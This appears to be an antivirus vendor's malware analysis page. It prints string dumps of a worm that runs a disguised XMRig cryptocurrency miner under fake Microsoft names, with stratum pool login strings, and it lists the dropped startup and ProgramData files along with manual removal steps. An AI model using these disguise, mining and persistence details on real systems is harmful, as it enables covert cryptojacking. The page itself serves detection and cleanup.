WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

system.exe_1728:

.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
.rsrc
/%X#H
3|$(3|$,1
%UUUU
UUUU%UUUU
3333333
pipe
libgcc_s_dw2-1.dll
libgcj-16.dll
"%s" hash self-test failed.
[%d-d-d d:d:d]%s %s%s
[%d-d-d d:d:d]
[%s:%u] getaddrinfo error: "%s"
{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] DNS error: "%s"
[%s:%u] error: "%s", code: %lld
[%s:%u] unsupported method: "%s"
[%s:%u] login error code: %d
[%s:%u] JSON decode failed: "%s"
[%s:%u] read error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}
[%s:%u] connect error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[01;36m%s:%d
[01;30m%s
use pool %s:%d %s
[01;37m%u
[31m"%s"
accepted (%lld/%lld) diff %u "%s" (%llu ms)
accepted (%lld/%lld) diff %u (%llu ms)
[01;37m%s:%d
[01;37m%d
new job from %s:%d diff %d
stratum tcp://
.nicehash.com
donate.xmrig.com
XMRig 2.0.0
%d.%d.%d
libuv/%s
libjansson/%s
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
userpass
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-k, --keepalive send keepalived for prevent timeout (need pool support)
--nicehash enable nicehash support
--print-time=N print hashrate report every N seconds
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
* THREADS: %d, %s, av=%d, %sdonate=%d%%%s
[01;37mPOOL #%d:
[01;36m%s:%d
* POOL #%d: %s:%d
gcc/%d.%d.%d
2.0.0
[01;36mXMRig/%s
[01;37m libuv/%s%s
* VERSIONS: XMRig/%s libuv/%s%s
[01;37mHUGE PAGES: %s, %s
* HUGE PAGES: %s, %s
[01;37mCPU: %s (%d) %sx64 %sAES-NI
* CPU: %s (%d) %sx64 %sAES-NI
[01;36m%s
[22;36m%s %s
[01;36m%s H/s
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
0123456789;
%s/%s (Windows NT %lu.%lu
) libuv/%s
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
NUL byte in object key not supported
duplicate object key
unable to open %s: %s
Unknown system error %d
EAFNOSUPPORT
EMSGSIZE
EPIPE
EPROTONOSUPPORT
ESPIPE
address family not supported
ai_family not supported
socket type not supported
operation canceled
illegal operation on a directory
socket operation on non-socket
operation not supported on socket
operation not permitted
broken pipe
protocol not supported
cannot send after transport endpoint shutdown
[%c%c%c] %-8s %p
1.12.0
!loop->wq_async.async_sent
((uv_shutdown_t*) req)->handle->type == UV_NAMED_PIPE
%s: (%d) %s
(%d) %s
src/win/pipe.c
pipe->flags & UV_HANDLE_CONNECTION
pipe->u.fd == -1 || pipe->u.fd > 2
req->pipeHandle == INVALID_HANDLE_VALUE
req->pipeHandle != INVALID_HANDLE_VALUE
handle->type == UV_NAMED_PIPE
hThread == handle->pipe.conn.readfile_thread
req->write_buffer.base
!(handle->flags & UV_HANDLE_PIPESERVER)
pipe->type == UV_NAMED_PIPE
pipe->flags & UV_HANDLE_READ_PENDING
!(handle->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
\\?\pipe\uv\%p-%lu
handle->pipe.serv.accept_reqs
handle->pipe.serv.accept_reqs[0].pipeHandle != INVALID_HANDLE_VALUE
avail >= sizeof(ipc_frame.header)
bytes == sizeof(ipc_frame.header)
ipc_frame.header.flags <= (UV_IPC_TCP_SERVER | UV_IPC_RAW_DATA | UV_IPC_TCP_CONNECTION)
avail - sizeof(ipc_frame.header) >= sizeof(ipc_frame.socket_info_ex)
bytes == sizeof(ipc_frame) - sizeof(ipc_frame.header)
handle->pipe.conn.remaining_ipc_rawdata_bytes >= bytes
handle->write_queue_size >= req->u.io.queued_bytes
handle->stream.conn.write_reqs_pending > 0
pipe->pipe.conn.eof_timer == NULL
!(pipe->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
pipe->pipe.conn.ipc_pid != -1
rfds.fd_count == 1
rfds.fd_array[0] == handle->socket
wfds.fd_count == 1
wfds.fd_array[0] == handle->socket
efds.fd_count == 1
efds.fd_array[0] == handle->socket
!(options->flags & ~(UV_PROCESS_DETACHED | UV_PROCESS_SETGID | UV_PROCESS_SETUID | UV_PROCESS_WINDOWS_HIDE | UV_PROCESS_WINDOWS_VERBATIM_ARGUMENTS))
src/win/tcp.c
server->flags & UV_HANDLE_TCP_SINGLE_ACCEPT
handle->type == UV_TCP
(tcp)->activecnt >= 0
!((tcp)->flags & UV__HANDLE_CLOSING)
handle->tty.rd.read_line_buffer.base != NULL
handle->tty.rd.read_line_buffer.len > 0
handle->u.fd == -1 || handle->u.fd > 2
!(handle->flags & UV_HANDLE_TTY_READABLE) || handle->tty.rd.read_raw_wait == NULL
src/win/udp.c
handle->type == UV_UDP
handle->send_queue_size >= req->u.io.queued_bytes
len > 0 && len < ARRAY_SIZE(key_name)
_ntdll.dll
kernel32.dll
powrprof.dll
0.0.0.0
0123456789
%u.%u.%u.%u
fdopt.data.stream->type == UV_NAMED_PIPE
!(fdopt.data.stream->flags & UV_HANDLE_CONNECTION)
!(fdopt.data.stream->flags & UV_HANDLE_PIPESERVER)
mode == (PIPE_READMODE_BYTE | PIPE_WAIT)
0.4.0
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
Error cleaning up spin_keys for thread
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
Assertion failed: (%s), file %s, line %d
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
C%p %d %s
C%p %d V=%0X w=%ld %s
GCC: (Rev2, Built by MSYS2 project) 6.3.0
GCC: (Rev3, Built by MSYS2 project) 6.3.0
RegCloseKey
RegOpenKeyExW
ConnectNamedPipe
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeW
GetNamedPipeHandleStateA
PeekNamedPipe
SetNamedPipeHandleState
WaitNamedPipeW
_acmdln
_amsg_exit
MapVirtualKeyW
ADVAPI32.dll
IPHLPAPI.DLL
KERNEL32.dll
msvcrt.dll
PSAPI.DLL
USER32.dll
USERENV.dll
WS2_32.dll
<requestedExecutionLevel level="asInvoker"/>
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates application support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates application support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
ntdll.dll
Cadvapi32.dll
%s\%.*s
\\?\UNC\
eHARDWARE\DESCRIPTION\System\CentralProcessor\%d
File: %ws, Line %u
tmsvcrt.dll
VVV.microsoft.com
0.8.2
Copyright (C) 2016-2017 VVV.microsoft.com
microsoft.exe

svchost.exe_3588:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

WerFault.exe_3552:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
USER32.dll
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
IMM32.dll
wer.dll
COMCTL32.dll
faultrep.dll
Starting kernel vertical - %S
rundll32.exe
NtQueryInformationProcess failed with status: 0x%x
Reporting never started for process id %u
StringCchPrintf failed with 0x%x
NtWow64QueryInformationProcess64 failed with 0x%x
NtWow64ReadVirtualMemory64 failed with 0x%x
NtQueryInformationProcess failed with status 0x%x
WerpNtWow64QueryInformationProcess64 failed with status 0x%x
StringCchCopy failed with 0x%x
Invalid arg in %s
wdi.dll
dbgeng.dll
dbghelp.dll
SETUPAPI.dll
SHELL32.dll
VERSION.dll
WTSAPI32.dll
WerFault.pdb
PSShD
tSSh,<
t.PSj6
t5SSh
SShx`
tsShxc
t.Ph0j
_amsg_exit
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
GetProcessHeap
GetWindowsDirectoryW
RegDeleteKeyW
ReportEventW
RegOpenKeyW
RegSetKeyValueW
GetProcessWindowStation
EnumWindows
NtAlpcSendWaitReceivePort
NtAlpcConnectPort
ShipAssert
ntdll.dll
RegisterErrorReportingDialog
WerReportSubmit
WerReportAddFile
WerReportCreate
WerReportCloseHandle
WerReportSetUIOption
WerpGetReportConsent
WerpSetIntegratorReportId
WerpReportCancel
WerpAddRegisteredDataToReport
WerReportAddDump
WerpCreateIntegratorReportId
WerpSetReportFlags
WerpGetReportFlags
WerpIsTransportAvailable
WerReportSetParameter
WerpInitiateCrashReporting
version="1.0.0.0"
name="Microsoft.Windows.Feedback.Watson"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel
ÝCD0
#$$$3355<
##$$$335566
% "#$$$3355666=
"#$$33555666
!.DQ$
.Py>o
Kÿg
.ib:?
T3%X_
a,M.cbd
KEYW8
KEYWH
? ?$?(?,?0?4?8?
1 2$2(2,20242
>,?0?4?8?<?@?
?%?5?:?|?
5'565^5{5
3#3(353_3
=#='= =/=3=7=;=?=
=#=(=>=]=
>!>&>3>}>
1!1&131[1
Microsoft\Windows\WindowsErrorReporting\WerFault
%s %s
Global\WerKernelVerticalReporting
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl
CrashDumpEnabled.Old
CrashDumpEnabled.New
%SystemRoot%\MEMORY.DMP
LiveKernelReports
Software\Microsoft\Windows\Windows Error Reporting\LiveKernelReports
LiveKernelReportsPath
BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OS Version=%u_%u_%u&Service Pack=%u_%u&Product=%u_%u
*WerKernelReporting
%SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue
sysdata.xml
%s -k -q
SOFTWARE\Microsoft\Windows NT\CurrentVersion
<OSVER>%u.%u.%u %u.%u</OSVER>
<OSLANGUAGE>%u</OSLANGUAGE>
<ARCHITECTURE>%u</ARCHITECTURE>
<PRODUCTTYPE>%u</PRODUCTTYPE>
<FILESIZE>%u</FILESIZE>
<CREATIONDATE>d-d-d d:d:d</CREATIONDATE>
<NAME>%s</NAME>
<DATA>%s</DATA>
<ERROR>Failed at Step: %s with error 0x%x</ERROR>
%sDrivers\%s.sys
</%s>
<%s>%s</%s>
%u.%u.%u.%u
*.mrk
WER-%u-%u.sysdata.xml
Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER
SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\MemoryDiagnostic
Web Server
Software\Microsoft\Windows\Windows Error Reporting\Debug
%SystemRoot%\Minidump
0xx (0xx, 0xx, 0xx, 0xx)
%s\%2.2d%2.2d%2.2d-%u-%2.2d.dmp
*.dmp
Software\Microsoft\Windows\Windows Error Reporting
Software\Policies\Microsoft\Windows\Windows Error Reporting
\KernelObjects\SystemErrorPortReady
%s\%s
Microsoft.Windows.Setup
\WindowsErrorReportingServicePort
(0x%x): %s
%u %s
WindowsNTVersion
%u.%u
ErrorPort
\StringFileInfo\xx\%s
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
%s="%s"
%s.%s
%s %d
Software\Microsoft\Windows\Windows Error Reporting\Hangs
_NT_EXECUTABLE_IMAGE_PATH
wxmu.dmp
wxhu.dmp
axmu.dmp
axhu.dmp
hu.kdmp
mu.kdmp
hu.dmp
mu.dmp
Software\Microsoft\.NETFramework
NOT_TCPIP
sos.dll
version.xml
.version.xml
%s.xml
memory.hdmp
minidump.mdmp
Local\WERReportingForProcess%d
atk.kdmp
Software\Microsoft\Windows\Windows Error Reporting\Hangs\NHRTimes
%i|%d|%d
xxxxxxxxxxxxxxxx
xx
%d.%d.%d.%d
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)S:(ML;;NR;;;HI)
dc.noreflect
dc.xpmemdump
dc.xpdata
dc.CustomDump
dc.expmodmem
dc.expmoddata
dc.OnDemandKdmp
dc.xpmodmem
dc.xpmoddata
default=%s
memory=%s
module=%s
.dbgcfg.ini
ElevatedDataCollectionStatus.txt
Open process failed unexpectedly: 0X%X
Attempting to cross-proc reporting process!
Elevation:Administrator!new:%s
Reflection attempt failed: 0X%X
Attempting to reflect reporting process!
Could not collect dump for reflection cross process: 0x%x
Could not collect xproc for reflection: 0x%x
CollectFile for reflection failed: 0x%x
Could not collect dump for cross process: 0x%x
CollectReflectionDump failed with: 0x%x
0 processes found for xproc module: %s
Could not collect cross dump from module: 0x%x
CollectCrossProcessModuleDumps failed: 0x%x
CollectCrossProcessDumps failed: 0x%x
KernelDump failed: 0x%x
ProcessHandle
%s|%s
rpcrt4
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
sntdll.dll
WerDiagController.dll
Software\Microsoft\Windows\Windows Error Reporting\Plugins
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession
%s\%s\%u-%u.etl
%s\%s\%u-%u.etl_%d
Microsoft\Windows\FDR
%s-%d
Software\Microsoft\Windows\Windows Error Reporting\Plugins\DriverVerifier
Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder
%d-AppRecorderEnabled
%s /stop
psr.exe
Software\Microsoft\Windows\Windows Error Reporting\RuntimeExceptionHelperModules
verifier.dll
nVerifier.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
lsvchost.exe
"%s" "%s" "%s"
%s\system32\cofire.exe
psapi.dll
sfc_os.dll
werfault.exe
%s\%s-(PID-%u)-%u
%s\%s-(PID-%u).dmp
%s\*-(PID-*)-*
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
kernel32.dll
kernelbase.dll
ReportingMode
WinShipAssert
WindowsMessageReportingB1
Windows
ws2_32.dll
Software\Microsoft\SQMClient\%s\AdaptiveSqm\ManifestInfo
%s\Sqm%d.bin
CorporateWerPortNumber
BypassDataThrottling
Software\Microsoft\Windows\Windows Error Reporting\Consent
Windows Problem Reporting
6.1.7600.16385 (win7_rtm.090713-1255)
WerFault.exe
Windows
Operating System
6.1.7600.16385
Microsoft-Windows-WER-Diag/Operational


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3408

  2. Delete the original Worm file.
  3. Delete or disinfect the following files created/modified by the Worm:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.lnk (746 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (5681 bytes)
    C:\ProgramData\System32\1.bat (1372 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (2673 bytes)
    C:\ProgramData\System32\system.exe (6441 bytes)
    C:\ProgramData\System32\Security.exe (10161 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now